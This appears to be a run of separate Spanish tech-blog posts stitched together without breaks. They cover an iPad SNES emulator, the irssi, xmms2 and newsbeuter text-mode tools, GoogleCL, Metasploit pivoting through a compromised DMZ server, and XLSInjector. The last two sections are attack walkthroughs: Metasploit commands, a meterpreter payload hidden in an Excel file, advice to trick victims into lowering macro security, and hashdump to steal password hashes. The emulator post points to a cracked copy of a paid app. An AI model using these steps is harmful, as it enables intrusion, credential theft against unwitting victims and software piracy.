En la pasada WWCD, los ejecutivos de Apple afirmaron que iOS es la mayor plataforma de juegos, posee aproximadamente 50 millones de usuarios registrados (un numero muy superior a los conseguidos por Live y por PSN) y esto es gracias a las características de sus dispositivos que permiten a los desarrolladores innovar de muchas formas con sus creaciones.

Una de las características de los dispositivos iOS (Jailbreakeado) es la posibilidad de emular otras consolas (Nintendo, Genesis, Super Nintendo, Play Station, N64, etc..); Hoy vamos a ver como instalar uno de estos emuladores que cuenta con características especiales, como la posibilidad de descargar roms directamente de él y conectar via Bluetooth un control de Nintendo Wii!!.

Para jugar Super Nintendo (se pueden otras consolas) en nuestro dispositivo iPad (también puede ser un iPod Touch o iPhone) necesitamos:

• Un dispositivo iOS (iPad, iPhone o iPod Touch)
• Tener Cydia instalado (véase hacer jailbreak)

El emulador que vamos a utilizar se llama SNES A.D.X Plus se encuentra disponible en la tienda alternativa Cydia por un precio de 3.49USD, o lo puedes encontrar “cracktis” en el repositorio colombiano de Cydia CrackTouch.

Después de descargar el emulador desde Cydia o CrackTouch (como prefieras), pasamos a instalarlo y reiniciar nuestro sistema.

Abrimos el icono de “SNES A.D.X +” y después pulsamos el boton “Find Game” que se encuentra en la esquina superior derecha de la aplicacion.

Buscamos el juego que nos interesa, en nuestro caso seria Super Mario All Start (todo un clásico) y le damos  “Download Now!!!”.

Una vez terminada la descarga, damos click en el botón “Done” y con esto ya tendremos la rom en nuestro emulador, ahora pasamos a configurar nuestro control de Wii.

Damos click en “Settings” y habilitamos el botón “Wiimote”.

El SNES A.D.X Plus automáticamente habilitará el Bluetooth de tu dispositivo y empezará a buscar el Wiimote, es ahí donde presionas el botón 1 y 2 del Wiimote al mismo tiempo, hasta que lo detecte y habilite.

Con esto ya tendremos nuestro Wiimote configurado y listo para usar en nuestros juegos, podemos configurar varios Wiimote para jugar con alguien o usar el particular modo espejo (Settings/Orientation/Mirror mode) que permite dividir la pantalla de tu dispositivo en 2, permitiendo que juguemos con un amigo en el mismo dispositivo con controles virtuales.

Espero que saques jugo a tu equipo y revivas experiencias con los juegos de tu infancia… (o mires lo que jugaban los viejos si eres menor…)

También puede interesarte...

• Montando la Pantalla Táctil a Bajo Costo de Jhonny Lee
• Johnny Lee, en TED
• Pantalla TouchScreen sin tocar la Pantalla
• Utilizan el TouchScreen con el WiiMote para mejorar Aprendizaje
• Sensación de 3D real usando el Wiimote
• Convierte cualquier Pantalla en TouchScreen con el Wiimote
• Ver contenido de iTunes en el Wii
• Cómo construir aplicaciones seguras para iOS (iPhone, iPad, iPod Touch)

Cliente IRC

El IRC es un sistema muy usado de mensajería instantánea, básicamente debemos instalar un cliente en nuestro computador y conectarnos a uno de los tantos servers que hay en internet, los servidores tienen canales para tratar diferentes temáticas. DragonJAR también tiene su canal de IRC.

El cliente en modo texto para IRC no puede ser otro que irssi. Dentro de las diferentes características de irssi podemos destacar:

• Permite auto conectarse a varios servidores y varios canales.
• Posee una interfaz personalizable.
• Se pueden definir accesos rápidos desde tecleado y comandos personalizados.
• Permite extender su funcionalidad mediante scripts en perl.
• Puedes configurar tu irssi para que funcione como un proxy para otros clientes.

Para conectarse a una red, por ejemplo la de DragonJAR tenemos que ejecutar los siguientes comandos después de inicializado irssi.

/CONNECT irc.chatx.net

Esto nos conectara con el servidor irc.chatx.net y mostrara algo como:

Ahora para entrar al canal que queremos, solo tenemos que teclear /JOIN #DragonJAR y esto mostrará:

A este punto ya puedes chatear sin problemas. Ahora lo interesante es que podemos guardar esta configuración para no tener que repetir estos pasos la próxima vez que arranquemos irssi.

La configuración tiene un concepto de NETWORK (Red) que puede tener varios SERVER (Servidores) y podemos definir varios CHANNELS (Canales) para una NETWORK. Para crear una red llamada Dragonjar el comando es:

/NETWORK ADD Dragonjar

Para agregar un server a esta red, tecleamos:

/SERVER ADD -auto -network Dragonjar irc.chatx.net 6667

El parámetro -auto es para que se conecte a ese servidor cuando arranca, para agregar un canal a la red tecleamos:

/CHANNEL ADD -auto #DragonJAR Dragonjar

En irssi existen ventanas asociadas a un identificador, la ventana 1 es siempre la ventana de status y por cada canal en que entremos tendremos una nueva ventana. Para cambiar entre ventanas se usa una tecla META que por lo regular es ALT y el ID de la ventana, por ejemplo para pasar a la ventana 2 presionamos ALT+2, en caso de que ALT no funcione también podemos usar la tecla ESC.

Por ejemplo pensemos que estamos conectados a 3 canales (Dragonjar, Debian y Colibri), para pasar de un canal a otro solo tenemos que teclear ATL+2 o ALT+3 o ALT+4. Recordemos que ALT+1 es siempre la ventana de status. Ahora pensemos que queremos ver dos canales al mismo tiempo (Dragonjar y Debian) entonces lo que tenemos que hacer es escribir el siguiente comando:

/WINDOW SHOW 3

Lo que indica esto es que donde estemos parados dividirá la pantalla en 2 ventanas. Abajo pondrá la ventana actual y arriba pondrá la ventana 3 (la de Debian en este caso). Podremos ver algo como:

Además si nuestra pantalla es grande podemos ver 3 ventanas al mismo tiempo escribiendo:

/WINDOW SHOW 4

Esto dividirá la pantalla en la que estemos en 2 y mostrara abajo la ventana actual y arriba pondrá la venta 4, algo como:

irssi tiene mas funcionalidades y opciones, para mas información por favor revise la documentación y si continua teniendo dudas o problemas recuerde que podemos charlarlo en el foro.

Espero que este articulo despierte el interés de muchos y descarguen estas aplicaciones, las prueben y discutamos sus diferentes funcionalidades, quizá hasta encontremos aplicaciones mejores que estas.

También puede interesarte...

• La vida en modo texto I
• Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web
• Consejos Simples de Seguridad para ir a la Campus Party
• Configurando IPv6 en nuestro equipo
• iPad + Wiimote = Consola Arcade Portable
• SSDownloader – Gestor de descargas para Herramientas de Seguridad
• TrueCrypt – Cifra tu información en particiones virtuales
• Google por linea de comandos

Otra razón para estar inmerso en el modo texto es la maquina que tengo: Pentium M 1.70 MHz, 512MB de Ram y 60 Gb de Disco. Esto hace que si trato de usar KDE con muchas aplicaciones el sistema se torne lento y más si trato de usar un escritorio 3D. Pero nunca sucede esto si tengo varias aplicaciones en modo texto. Por ahora les contaré de 3 aplicaciones que uso en modo texto.

Reproductor de Música

Algunos usuarios antiguos de GNU/Linux recordaran el grandioso xmms similar a Winamp. El xmms ha frenado su desarrollo y algunas personas consideran su código obsoleto, por eso un grupo de programadores le a dado vida al mejorado XMMS2
Dentro de las cosas mas impresionantes de xmms2 es su funcionamiento cliente-servidor donde en el fondo corre el servidor que pone la música (xmms2d) y si necesitamos interactuar con él (pasar la canción, play, pause) lo hacemos desde el cliente (xmms2) y además hay varios clientes gráficos (esperanza, gxmms2, X4X y muchos otros) y clientes web.

Mostrare el uso básico del cliente en modo texto que trae por defecto el xmms2. Primero que todo la sintaxis básica:

xmms2 comando
xmms2 modulo comando

El xmms2 tiene diferentes módulos entre ellos el playlist. Para agregar canciones al playlist:

xmms2 add cancion.mp3

Para agregar todo un directorio al playlist:

xmms2 radd directorio/

Algunos comandos básicos son:

xmms2 play # Darle play a una cancion
xmms2 pause # Pausar una cancion
xmms2 next # Pasar a la siguiente cancion del playlist
xmms2 jump 14 # Saltar a la cancion numero 14 del playlist
xmms2 list # Mostrar el playlist
xmms2 current # Mostrar el Autor y el titulo de la cancion actual

Para mas información de comandos puede ver el manual: man xmms2
Un interesante plug-in de xmms2 es su xmms2-Scrobbler el cual es un cliente audioscrobbler que permite enviar la información necesaria a Last.fm como ejemplo pueden ver mi perfil. Si alguien tiene dudas o problemas en usar/configurar este programa podemos debatirlo en el foro.

Lector de Noticias RSS

La aplicación que uso para los feeds RSS es newsbeuter un lector de RSS en modo texto. Algunos dicen que newsbeuter es el mutt(cliente de correo en modo texto) de los RSS. Dentro de las características de newsbeuter podemos destacar:

• Soporte para feeds Atom, RSS 0.9x, RSS 1.0 y RSS 2.0
• Personalización con accesos rápidos desde el teclado.
• Búsqueda en los artículos descargados.
• Categorización de feeds por medio de tags.
• Permite integrarle plug-ins.
• Sincronización con cuentas en bloglines.com
• Permite importar y exportar por medio de archivos OPML
• Interfaz configurable

Para poder arrancar el programa después de instalado se debe tener definido un archivo de URL, este archivo contiene la lista de los feeds tuyos. En sistemas GNU/Linux regulares el archivo de configuración se encuentra en ~/.newsbeuter/urls y tiene una sintaxis como la siguiente:

http://servidor.com/feed.php “Tag a usar”

Donde primero se pone la URL del feed y seguido por un espacio y entre comillas se pone el tag que deseamos. Después arrancamos el programa y veremos algo como:

Por defecto no descarga los feeds cuando arranca para eso debemos dar r para recargar el feed o R para recargar todos los feeds. Ahora vemos:

Para ver el listado de noticias basta con dar enter.

Para ver la noticia basta con dar enter.

También puedes abrir la noticia en el navegador que uses por defecto presionando la tecla o.

El Archivo de configuración de newsbeuter se encuentra en ~/.newsbeuter/config si el archivo no existe o está vacío la configuración por defecto es:

always-display-description false
article-sort-order date
articlelist-format “%4i %f %D %?T?;%-17T; ?%t”
auto-reload no
cache-file “~/.newsbeuter/cache.db”
cleanup-on-quit yes
confirm-exit no
datetime-format %b %d
display-article-progress yes
feedlist-format “%4i %n %11u %t”
goto-next-feed yes
html-renderer internal
max-items 0
notify-format “newsbeuter: finished reload, %f unread feeds (%n unread articles total)”
notify-screen no
notify-xterm no
podcast-auto-enqueue no
refresh-on-startup no
reload-only-visible-feeds no
reload-time 60
save-path ~/
show-keymap-hint yes
show-read-feeds yes
show-read-articles yes
suppress-first-reload no

Es muy recomendable que si deseas conocer todas las funcionalidades de newsbeuter leas su documentación. Si algún lector tiene problemas con newsbeuter podemos hablarlo en el foro.

Continua leyendo la segunda parte

También puede interesarte...

• La vida en modo texto II
• Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web
• Consejos Simples de Seguridad para ir a la Campus Party
• Configurando IPv6 en nuestro equipo
• iPad + Wiimote = Consola Arcade Portable
• SSDownloader – Gestor de descargas para Herramientas de Seguridad
• TrueCrypt – Cifra tu información en particiones virtuales
• Google por linea de comandos

Google siempre nos sorprende con sus nuevas herramientas, siempre tratando de ofrecernos todas las facilidades para utilizar sus servicios; Hoy les traigo una nueva utilidad de Google Llamada GoogleCL.

Google CL, es una herramienta que permite utilizar todos los servicios de Google desde la linea de comandos, por ejemplo podemos postear artículos en Blogger, subir vídeos a Youtube, fotos a Picasa, realizar búsquedas, revisar contactos, etc.. todo sin salir de nuestra consola.

Google CL esta escrito en Python y utiliza las librerías gdata-python-client library, es multiplataforma y también existe un paquete para Debian o sus deribados (ubuntu) con el que se puede instalar fácilmente.

Agunos ejemplos de lo que podemos hacer con GoogleCL:

• Blogger

$ google blogger post --title "GoogleCL" "escribiendo desde linea de comandos"

• Calendar

$ google calendar add "Escribir Articulos para la Comunidad DragonJAR"

• Contacts

$ google contacts list name,email > contactos.csv

• Docs

$ google docs edit --title "Lista de tareas"

• Picasa

$ google picasa create --album "Fotos Campus Party" ~/fotos/eventos/campus/*.jpg

• Youtube

$ google youtube post --category Tecnología dragonjartvcap1.avi

Seguro esta herramienta nos sera muy útil para automatizar tareas, realizar backups o cualquier otra cosa que se nos ocurra, ya que el script es bastante personalizable y fácil de entender.

Para mas información visita la pagina oficial del GoogleCL en Google Code.

También puede interesarte...

• Curso de Python dictado por Google
• Cómo configurar LDAP en Ubuntu Server o Debian
• iPad + Wiimote = Consola Arcade Portable
• La vida en modo texto II
• La vida en modo texto I
• Cupos disponibles en el SENA
• The Social-Engineer Toolkit
• Google Hacking

Veamos un ejemplo:

Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el  amado  y conocido Metasploit nos puede ser muy útil.

El primer paso obviamente  es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos:

use [exploit que ataca la vulnerabilidad encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-la-vulnerabilidad-encontrada

Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter:

sessions -l

El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior:

msf> route add [ip_maquina_objetivo] [Mascara  de red] [ID-Session]

Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso:

msf> use [exploit_necesario]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [maquina_objetivo]
msf> exploit

De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática

También puede interesarte...

• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• ¿Cómo tomar control de un Dominio en Windows?
• Video: Explotando WM Downloader
• Video Tutorial Fingerprint y Escaneo Básico
• Todos los Vídeos de AntiChat – Parte I
• Todos los Vídeos de AntiChat – Parte II
• 101 Libros de Seguridad Informática Gratis
• BugCON 2012

En esta ocasión les voy a hablar sobre XLSInjector, una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

• Una Maquina (virtual o real) con Windows
• Microsoft Excel
• Perl
• El modulo Win32:OLE para Perl
• Un archivo XML a infectar
• El XLSInjector
• y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

• iniciamos la consola del metasploit
• una vez en la consola de MSF cargamos el payload de meterpreter
  set payload windows/meterpreter/bind_tcp
• lo configuramos adecuadamente
  set RHOST ipdelpcvictima
set RPOT 4444
• luego lo lanzamos
  exploit

Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo remoto, hay que recordar que las shell meterpreter son diferentes a las del sistema operativo, y tienen su propio listado de comandos, puedes sacar el listado de comandos disponibles para la shell meterpreter escribiendo “?” y enter, te arrojara algo parecido a esto:

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes

Hay que resaltar la potencia de meterpreter para inyectar dll’s, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos documentos (Meterpreter.pdf y MSF3-met.html) para que aprendas mas sobre los comandos del meterpreter.

Te recomiendo utilizar el comando migrate tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es hashdump que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la clave de los usuarios con herramientas como l0phtcrack o cain&abel.

Por ultimo les dejo el video del autor, donde nos enseña el funcionamiento del XLSInjector

También puede interesarte...

• Manual en español de Meterpreter
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• FOCA – Herramienta para análisis de Meta Datos
• iPad + Wiimote = Consola Arcade Portable
• Cómo descubrir vulnerabilidades y escribir exploits
• La vida en modo texto II
• La vida en modo texto I
• Google por linea de comandos